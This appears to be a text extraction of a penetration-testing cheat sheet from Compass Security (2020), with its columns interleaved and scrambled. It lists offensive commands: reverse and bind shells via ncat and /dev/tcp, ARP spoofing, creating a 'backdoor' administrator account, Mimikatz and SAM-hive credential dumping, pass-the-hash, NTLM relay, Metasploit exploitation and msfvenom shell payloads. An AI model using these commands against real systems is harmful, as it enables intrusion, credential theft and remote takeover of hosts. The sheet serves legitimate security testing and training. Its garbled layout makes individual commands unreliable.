Start TLS Server: Delete ARP cache: Scan for vulnerabilities (script category filter):

Hacking Tools Cheat Sheet # ncat --ssl -l -p 1337 --ssl-cert # ip neigh flush all # nmap -n -Pn --script "vuln and safe"
Compass Security, Version 1.1, January 2020 cert.pem --ssl-key key.pem Sniff traffic: 10.5.23.0/24
https://www.compass-security.com Connect to TLS service: # tcpdump [options] [filters] Performance Tuning (1 SYN packet ≈ 60 bytes
# ncat --ssl 10.5.23.42 1337 Useful tcpdump options: → 20'000 packets/s ≈ 10 Mbps):
Basic Linux Networking Tools Connect to TLS service using openssl: ▪ -i interface: Interface or any for all # nmap -n -Pn --min-rate 20000
10.5.23.0/24
Show IP configuration: # openssl s_client -connect ▪ -n: Disable name and port resolution
# ip a l 10.5.23.42:1337 ▪ -A: Print in ASCII Useful nmap options:
Change IP/MAC address: Show certificate details: ▪ -XX: Print in hex and ASCII ▪ -n: Disable name and port resolution
# ip link set dev eth0 down # openssl s_client -connect ▪ -w file: Write output PCAP file ▪ -PR: ARP host discovery
# macchanger -m 23:05:13:37:42:21 eth0 10.5.23.42:1337 | openssl x509 -text ▪ -r file: Read PCAP file ▪ -Pn: Disable host discovery
# ip link set dev eth0 up Test TLS server certificate and ciphers: ▪ -sn: Disable port scan (host discovery only)
Useful tcpdump filters:
Static IP address configuration: # sslyze --regular 10.5.23.42:443 ▪ -sS/-sT/-sU: SYN/TCP connect/UDP scan
▪ not arp: No ARP packets
# ip addr add 10.5.23.42/24 dev eth0 TCP to TLS proxy: ▪ --top-ports 50: Scan 50 top ports
▪ port ftp or port 23: Only port 21 or 23
DNS lookup: # socat TCP-LISTEN:2305,fork,reuseaddr ▪ -iL file: Host input file
▪ host 10.5.23.31: Only from/to host
ssl:example.com:443 ▪ -oA file: Write output files (3 types)
# dig compass-security.com ▪ net 10.5.23.0/24: Only from/to hosts in
Online TLS tests: ▪ -sC: Script scan (default scripts)
Reverse DNS lookup: network
# dig -x 10.5.23.42 ▪ ssllabs.com, hardenize.com ▪ --script <file/category>: Specific scripts
Advanced sniffing using tshark or Wireshark. ▪ -sV: Version detection
Information Gathering HTTP Tools Sniffing over SSH on a remote host: ▪ -6: IPv6 scan
# ssh 10.5.23.42 tcpdump -w- port not The target can be specified using CIDR notation
Find owner/contact of domain or IP address: Start Python webserver on port 2305: ssh | wireshark -k -i -
# whois compass-security.com # python3 -m http.server 2305 (10.5.23.0/24) or range definitions (10.13-
Search in network traffic: 37.5.1-23).
Get nameservers and test for DNS zone transfer: Perform HTTP Request: # ngrep -i password
# dig example.com ns # curl http://10.5.23.42:2305/?foo=bar Fast scan using masscan:
# dig example.com axfr @n1.example.com Show HTTP GET requests: # masscan -p80,8000-8100 --rate 20000
Useful curl options: # urlsnarf 10.0.0.0/8
Get hostnames from CT logs: Search for ▪ -k: Accept untrusted certificates
Show transmitted images: Public internet scan databases:
%.compass-security.com on https://crt.sh. ▪ -d "foo=bar": HTTP POST data
# driftnet ▪ shodan.io, censys.io
Or using an nmap script: ▪ -H: "Foo: Bar": HTTP header
# nmap -sn -Pn compass-security.com ▪ -I: Perform HEAD request Network Scanning
--script hostmap-crtsh ▪ -L: Follow redirects Shells
ARP Scan: Start bind shell (on victim):
Combine various sources for subdomain enum: ▪ -o foobar.html: Write output file
# nmap -n -sn -PR 10.5.23.0/24
# amass enum -src -brute -min-for- ▪ --proxy http://127.0.0.1:8080: Set proxy # ncat -l -p 2305 -e "/bin/bash -i"
recursive 2 -d compass-security.com Reverse DNS lookup of IP range: Connect to bind shell (on attacker):
Scan for common files/applications/configs: # nmap -sL 10.5.23.0/24
# nikto -host https://example.net # ncat 10.5.23.42 2305
TCP Tools Nmap host discovery (ARP, ICMP, SYN 443/tcp, Listen for reverse shell (on attacker):
Enumerate common directory-/filenames:
Listen on TCP port: ACK 80/tcp): # ncat -l -p 23
# gobuster dir -k -u
# ncat -l -p 1337 # nmap -sn -n 10.5.23.0/24
https://example.net -w Start reverse shell (on victim):
Connect to TCP port: /usr/share/wordlists/dirb/common.txt TCP scan (SYN scan = half-open scan): # ncat -e "/bin/bash -i" 10.5.23.5 23
# ncat 10.5.23.42 1337 # nmap -Pn -n -sS -p
Start reverse shell with bash only (on victim):
Sniffing 22,25,80,443,8080 10.5.23.0/24
# bash -i &>/dev/tcp/10.5.23.5/42 0>&1
TLS Tools ARP spoofing: List Nmap scripts:
# ls /usr/share/nmap/scripts Upgrade to pseudo terminal:
Create self-signed certificate: # arpspoof -t 10.5.23.42 10.5.23.1
# python -c 'import pty;
# openssl req -x509 -newkey rsa:2048 Or a graphical tool: Scan for EternalBlue vulnerable hosts: pty.spawn("/bin/bash")'
-keyout key.pem -out cert.pem -nodes # ettercap -G # nmap -n -Pn -p 443 --script smb-
-subj "/CN=example.org/" vuln-ms17-010 10.5.23.0/24
Show ARP cache:
# ip neigh
Vulnerability DBs and Exploits Upgrade to Meterpreter (or press ^Z (Ctrl-Z)): bypass ExecutionPolicy and execute Invoke- Meterpreter via pass-the-hash:
background AllChecks. Use the abuse functions. msf > set payload
Exploit search (local copy of the Exploit-DB): Background session 1? [y/N] y windows/meterpreter/reverse_tcp
# searchsploit apache Add a new local admin:
> sessions # list sessions msf > set LHOST 10.5.23.42 # attacker
C:\> net user backdoor P@ssw0rd23
Show exploit file path and copy it into clipboard: > sessions -u 1 # Upgrade
C:\> net localgroup Administrators
msf > set LPORT 443
# searchsploit -p 40142 > sessions 2 # interact with session 2 msf > set RHOST 10.5.23.21 # victim
backdoor /add
meterpreter > sysinfo # use it msf > set SMBPass 01[...]03:01[...]03
Online vulnerability and exploit databases:
Scan for network shares: msf > exploit
▪ cvedetails.com, exploit-db.com, Upload / download files:
# smbmap.py --host-file smbhosts.txt - meterpreter > shell
packetstormsecurity.com meterpreter > upload pwn.exe
u Administrator -p PasswordOrHash C:\WINDOWS\system32>
meterpreter > download c:\keepass.kdb
Cracking Execute a file: Windows Credentials Gathering NTLM Relay
meterpreter > execute -i -f /your/bin
Try SSH passwords from a wordlist: Start Mimikatz and create log file: Vulnerable if message_signing: disabled:
# ncrack -p 22 --user root -P Port forwarding to localhost: C:\>mimikatz.exe # nmap -n -Pn -p 445 --script smb-
./passwords.txt 10.5.23.0/24 meterpreter > portfwd add -l 2323 -p # privilege::debug security-mode 10.5.23.0/24
3389 -r 10.5.23.23
Determine hash type: # log C:\tmp\mimikatz.log
Disable SMB and HTTP in Responder.conf and
# hashid 869d[...]bd88 Background Meterpreter session: Read lsass.exe process dump: start Responder:
meterpreter > background
Show example hash types for hashcat: # sekurlsa::minidump lsass.dmp # ./Responder.py -I eth0
# hashcat --example-hashes Pivoting through existing Meterpreter session: Dump lsass.exe in taskmgr or procdump. NTLM Relay to target and extract SAM file:
> use post/multi/manage/autoroute
Crack hashes (e.g. 5600 for NetNTLMv2 type): > set session 2 # meterpreter session Show passwords/hashes of logged in users: # ./ntlmrelayx.py -smb2support -t
# hashcat -m 5600 -a 0 hash.txt # sekurlsa::logonpasswords smb://10.5.23.42
> run
/path/to/wordlists/* NTLM Relay using socks proxy:
> route Backup SYSTEM & SAM hive:
Crack hashes using John the Ripper: SOCKS via Meterpreter (requires autoroute): C:\>reg save HKLM\SYSTEM system.hiv # ./ntlmrelayx.py -tf targets.txt
# john hashes.txt C:\>reg save HKLM\SAM sam.hiv -smb2support -socks
> use auxiliary/server/socks4a
> set SRVPORT 8080 Extract hashes using Mimikatz: Configure ProxyChains:
Metasploit Framework > run # vi /etc/proxychains.conf
# lsadump::sam /system:system.hiv
Start Metasploit: Configure ProxyChains: /sam:sam.hiv [...]
# msfconsole socks4 127.0.0.1 1080
# vi /etc/proxychains.conf
Search exploit: [...] Pass-the-Hash Access files via SOCKS proxy:
socks4 127.0.0.1 1080 # proxychains smbclient -m smb3
> search eternalblue Shell via pass-the-hash (Impacket Tools):
'\\10.5.23.42\C$' -W pc05 -U
Use exploit: Connect through SOCKS proxy: # ./psexec.py -hashes
Administrator%invalidPwd
msf > use exploit/windows/smb/ms17_… # proxychains ncat 172.23.5.42 1337 :011AD41795657A8ED80AB3FF6F078D03
domain/[email protected]
Configure exploit: Active Directory
Linux Privilege Escalation Over a subnet and extract SAM file:
msf exploit(…) > show options
Use SharpHound to gather information and im-
msf exploit(…) > set TARGET 10.5.23.42 Enumerate local information (-t for more tests): # crackmapexec -u Administrator -H
# curl -o /tmp/linenum :011AD41795657A8ED80AB3FF6F078D03 port into Bloodhound to analyze.
Run exploit: 10.5.23.0/24 --sam Download PingCastle from pingcastle.com and
msf exploit(…) > exploit https://raw.githubusercontent.com/rebo
otuser/LinEnum/master/LinEnum.sh Browse shares via pass-the-hash: generate Report.
Generate reverse shell (WAR): # bash /tmp/linenum -r /tmp/report # ./smbclient.py
# msfvenom -p
Other hardening checks can be done using lynis domain/[email protected] -hashes More Online References
java/jsp_shell_reverse_tcp LHOST=<your :011AD41795657A8ED80AB3FF6F078D03 ▪ GitHub "swisskyrepo/PayloadsAllTheThings"
ip address> LPORT=443 -f war > sh.war or LinPEAS.
RDP via pass-the-hash: ▪ GitHub "danielmiessler/SecLists
Reverse shell listener: Use sudo/SUID/capabilities/etc. exploits from
# xfreerdp /u:user /d:domain /pth: ▪ GitHub "enaqx/awesome-pentest"
> use exploit/multi/handler gtfobins.github.io.
011AD41795657A8ED80AB3FF6F078D03
> set payload /v:10.5.23.42
linux/x64/shell_reverse_tcp Windows Privilege Escalation
> set LHOST 10.5.23.42 # attacker
Copy PowerUp.ps1 from GitHub "Pow-
> set LPORT 443
> exploit erShellMafia/PowerSploit" into PowerShell to